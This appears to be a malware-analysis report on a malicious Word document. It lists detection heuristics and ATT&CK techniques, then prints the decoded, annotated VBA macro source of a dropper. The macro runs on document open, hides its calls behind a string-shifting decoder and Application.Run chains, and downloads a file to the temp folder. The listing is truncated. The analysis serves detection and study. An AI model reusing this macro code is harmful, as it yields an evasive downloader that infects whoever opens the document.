MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The critical ClamAV detection and the high-severity heuristics for VBA macros (Document_Open, CreateObject, GetObject and CallByName) indicate malicious intent. The VBA script uses GetObject, CreateObject and CallByName to execute arbitrary code, likely to download and run a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-1821470 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-1821470
-
VBA macros detected — medium — 5 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call
-
GetObject call — high — OLE_VBA_GETOBJ: GetObject call
-
CallByName call — high — OLE_VBA_CALLBYNAME: CallByName call
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: af53ed5cec37d10e8715006f32afc3d249cc9a8f5e5505e1c87beedda016a234) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5258 bytes |
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header written by olevba on export. VB_Name = "ThisDocument" means the
' code below lives in the document's own ThisDocument module, which is where the
' Document_Open auto-exec handler further down is picked up by Word.
' Returns the method name that the dispatcher ruwfoGABGjTt invokes on Word.
' "ovS" run through bvwBYAUSGbUU (reverse the string, subtract 1 from each
' character code) decodes to "Run", so the literal never appears in source.
Private Function EKiieIlRUAaa()
EKiieIlRUAaa = bvwBYAUSGbUU("ovS")
End Function
' Late-bound dispatcher: calls a method on the already-running Word instance.
' VumfGWEsqWPB: method name (every visible caller passes the decoded "Run").
' hFjlzwwPxLzm: single argument forwarded to that method (a macro name).
' Declared As a Function but never assigns a return value, so callers get Empty.
Private Function ruwfoGABGjTt(ByVal VumfGWEsqWPB As String, ByVal hFjlzwwPxLzm As String)
Dim GUVHOuckpNOH As Object
' GetObject with an omitted first argument attaches to a running instance of the
' ProgID; "opjubdjmqqB/espX" decodes through bvwBYAUSGbUU to "Word.Application".
Set GUVHOuckpNOH = GetObject(, bvwBYAUSGbUU("opjubdjmqqB/espX"))
' CallType 1 = VbMethod. Resolving the method by name at run time keeps
' "Application.Run" out of the source text that static scanners see.
CallByName GUVHOuckpNOH, VumfGWEsqWPB, 1, hFjlzwwPxLzm
End Function
' Auto-exec entry point: Word runs this when the document is opened (flagged by
' OLE_VBA_DOCOPEN in the report). It does nothing itself except hand control to
' the next link of the macro chain through Application.Run.
Private Sub Document_Open()
Dim gttdejECYPrq
Dim mbMSdVYMssUQ
Dim LTEkbTEQRNri
' "Run"
LTEkbTEQRNri = EKiieIlRUAaa
' "vUlrNqrBiXtZ" decodes to "YsWhAqpMqkTu", the Sub defined directly below.
gttdejECYPrq = bvwBYAUSGbUU("vUlrNqrBiXtZ")
' Equivalent to Application.Run "YsWhAqpMqkTu"; the return value is unused.
mbMSdVYMssUQ = ruwfoGABGjTt(LTEkbTEQRNri, gttdejECYPrq)
End Sub
' Second link of the chain, reached from Document_Open via Application.Run.
' Same shape as its caller: decode the next Sub's name and Run it. Hopping
' through Run rather than calling directly means no visible call graph links
' Document_Open to the downloader.
Private Sub YsWhAqpMqkTu()
Dim SyCyqeTiQiqp
Dim tFPHVZsKGlEi
Dim hzOEgOCqlULO
' "Run"
hzOEgOCqlULO = EKiieIlRUAaa
' "qXGQQScVfqbK" decodes to "JapeUbRPPFWp", the next Sub in this module.
SyCyqeTiQiqp = bvwBYAUSGbUU("qXGQQScVfqbK")
tFPHVZsKGlEi = ruwfoGABGjTt(hzOEgOCqlULO, SyCyqeTiQiqp)
End Sub
' Third link of the Run chain (reached from YsWhAqpMqkTu); decodes and Runs the
' next Sub. Pure indirection, no other side effects.
Private Sub JapeUbRPPFWp()
Dim vRPXSwgqDLQq
Dim nqXUKjWdLVnL
Dim hrEfzLDEJlJy
' "Run"
hrEfzLDEJlJy = EKiieIlRUAaa
' "qwbjX[cYJULJ" decodes to "IKTIXbZWiavp", the Sub defined next.
vRPXSwgqDLQq = bvwBYAUSGbUU("qwbjX[cYJULJ")
nqXUKjWdLVnL = ruwfoGABGjTt(hrEfzLDEJlJy, vRPXSwgqDLQq)
End Sub
' Fourth link of the Run chain (reached from JapeUbRPPFWp). Identical pattern,
' with the decode and the "Run" lookup swapped in order.
Private Sub IKTIXbZWiavp()
Dim CspGbKDHnqCm
Dim BKHzmvFTnXLd
Dim KptAcyPKbBvi
' "kuESpVQUhtWS" decodes to "RVsgTPUoRDtj". That Sub is not in the visible
' preview (the listing is truncated), so its body cannot be confirmed here;
' presumably it is what calls the downloader gMVdMSOdxpYi.
CspGbKDHnqCm = bvwBYAUSGbUU("kuESpVQUhtWS")
' "Run"
KptAcyPKbBvi = EKiieIlRUAaa
BKHzmvFTnXLd = ruwfoGABGjTt(KptAcyPKbBvi, CspGbKDHnqCm)
End Sub
' Returns the character code of the character at 1-based position SFxYmrJlNFiF
' in MAaxbroNedii. Helper for the string decoder bvwBYAUSGbUU.
Private Function nNbEEOGibISX(ByVal MAaxbroNedii As String, ByVal SFxYmrJlNFiF As Integer) As Integer
Dim gpJEJUraZwCX As String
gpJEJUraZwCX = Mid(MAaxbroNedii, SFxYmrJlNFiF, 1)
nNbEEOGibISX = Asc(gpJEJUraZwCX)
End Function
' Hand-rolled Len(): walks DdWMbcfHbtSb with Mid until Mid returns "" (which it
' does once the start index passes the end of the string) and returns the count
' of characters seen. Functionally the same as Len, apparently written this way
' to avoid the keyword.
Private Function GmkNmYUGXyCC(ByVal DdWMbcfHbtSb As String) As Integer
Dim DpeMTOiCOoKb
DpeMTOiCOoKb = 1
While Mid(DdWMbcfHbtSb, DpeMTOiCOoKb, 1) <> ""
DpeMTOiCOoKb = DpeMTOiCOoKb + 1
Wend
' Loop exits one past the last character.
GmkNmYUGXyCC = DpeMTOiCOoKb - 1
End Function
' String decoder used for every ProgID, method name and macro name in this
' module. For each character of MAaxbroNedii it subtracts 1 from the code and
' prepends the result, so the output is the input reversed with every character
' shifted down by one (e.g. "ovS" -> "Run"). Detection can key on the decoded
' values since they are fixed at build time; an empty input returns "".
Private Function bvwBYAUSGbUU(ByVal MAaxbroNedii As String) As String
Dim SLZennNfdTXd As Integer
Dim CpAgvGqfvlEp As String
bvwBYAUSGbUU = ""
For SLZennNfdTXd = 1 To GmkNmYUGXyCC(MAaxbroNedii)
' Shift by -1.
CpAgvGqfvlEp = Chr(nNbEEOGibISX(MAaxbroNedii, SLZennNfdTXd) - 1)
' Prepending rather than appending is what reverses the string.
bvwBYAUSGbUU = CpAgvGqfvlEp & bvwBYAUSGbUU
Next SLZennNfdTXd
End Function
' Sets the Type property of the passed object to 1. "fqzU" decodes to "Type";
' CallType 4 = VbLet, so this is a property assignment, not a method call.
' The only visible caller passes an ADODB.Stream, for which Type = 1 is the
' binary-mode constant (adTypeBinary) -- consistent with writing ResponseBody.
Private Sub eswMRUSPonQp(ByVal zgRwOnXZgTrj As Variant)
CallByName zgRwOnXZgTrj, bvwBYAUSGbUU("fqzU"), 4, 1
End Sub
' Fetches a resource over HTTP and pushes the response body through an ADODB
' stream; returns True on success, False if any step raises an error or the HTTP
' status is not 200. This is the download stage the report's T1203 / dropper
' verdict refers to.
' sFbSnVIiRpnY: URL passed to the request's Open call.
' oZdaKHgdJUBu: destination path handed to yCILvjFpLaTK (that helper is outside
'   the visible preview; by its arguments it looks like the save step -- confirm).
' Every ProgID, method name and verb is stored encoded and recovered at run time
' through bvwBYAUSGbUU, so none of them appears as a plain literal.
Private Function gMVdMSOdxpYi(ByVal sFbSnVIiRpnY As String, ByVal oZdaKHgdJUBu As String) As Boolean
Dim nhHPxdkSdRMi As Object
Dim QPxOchxebWiC As Variant
Dim vTVBDfxXwFWj As Integer
Dim hYauLHPHVbMW As Object
Dim aoxrceCOoJtf
' Any run-time error (COM object unavailable, network failure) jumps to the
' failure label, so the function fails silently with False.
On Error GoTo BuvkMtUpfkHe
' Decodes to "MSXML2.ServerXMLHTTP.6.0".
aoxrceCOoJtf = bvwBYAUSGbUU("1/7/QUUIMNYsfwsfT/3MNYTN")
Set hYauLHPHVbMW = CreateObject(aoxrceCOoJtf)
' .Open "GET", url, False -- a synchronous request (CallType 1 = VbMethod).
CallByName hYauLHPHVbMW, bvwBYAUSGbUU("ofqP"), 1, bvwBYAUSGbUU("UFH"), sFbSnVIiRpnY, False
' .Send
CallByName hYauLHPHVbMW, bvwBYAUSGbUU("eofT"), 1
vTVBDfxXwFWj = hYauLHPHVbMW.Status
' 100 + 100 is 200 split to avoid the literal; anything but HTTP 200 is failure.
If vTVBDfxXwFWj <> 100 + 100 Then
GoTo BuvkMtUpfkHe
End If
QPxOchxebWiC = hYauLHPHVbMW.ResponseBody
' Decodes to "ADODB.Stream".
aoxrceCOoJtf = bvwBYAUSGbUU("nbfsuT/CEPEB")
Set nhHPxdkSdRMi = CreateObject(aoxrceCOoJtf)
' eswMRUSPonQp sets the stream's Type to 1 (see that Sub). The next four
' helpers are not in the visible preview; from their argument shapes they
' presumably open the stream, write the body, save to the path and close --
' confirm against the full module before relying on that.
eswMRUSPonQp nhHPxdkSdRMi
OVVyWdXjusGs nhHPxdkSdRMi
WgojCxeeTcRj nhHPxdkSdRMi, QPxOchxebWiC
yCILvjFpLaTK nhHPxdkSdRMi, oZdaKHgdJUBu
KzKeCbsfELjv nhHPxdkSdRMi
gMVdMSOdxpYi = True
Exit Function
BuvkMtUpfkHe:
gMVdMSOdxpYi = False
End Function
' Builds a path inside the user's temporary folder with a pseudo-random numeric
' file name ("<temp>/<Rnd>", no extension). Returns "" if the folder lookup
' comes back empty. Used by bjAdloBAPOxW below as the drop location.
Private Function sggcRoSuhARu() As String
Dim eLIfZIhcEQxI As Object
Dim XaXsuPUncgAY As String
Dim vMQdyVFByGVz
' Decodes to "Scripting.FileSystemObject".
vMQdyVFByGVz = bvwBYAUSGbUU("udfkcPnfutzTfmjG/hojuqjsdT")
Set eLIfZIhcEQxI = CreateObject(vMQdyVFByGVz)
' Decodes to "GetSpecialFolder" but is never used: the method is called directly
' on the next line. Dead assignment, likely leftover from a CallByName variant.
vMQdyVFByGVz = bvwBYAUSGbUU("sfempGmbjdfqTufH")
' GetSpecialFolder(2) is the TemporaryFolder constant.
XaXsuPUncgAY = eLIfZIhcEQxI.GetSpecialFolder(2)
If XaXsuPUncgAY <> "" Then
' "0" decodes to "/". Rnd is unseeded here, so the name is predictable across runs.
sggcRoSuhARu = XaXsuPUncgAY & bvwBYAUSGbUU("0") & Rnd
End If
End Function
Private Sub bjAdloBAPOxW(ByVal sFbSnVIiRpnY As String)
Dim OawrlbRUnqJn As String
Dim JXArvPtHUeWN As Object
Dim WvOhCPhmMHDr
On Error GoTo BuvkMtUpfkHe
OawrlbRUnqJn = sggcRoSuhARu
gM
... (truncated)
|
|||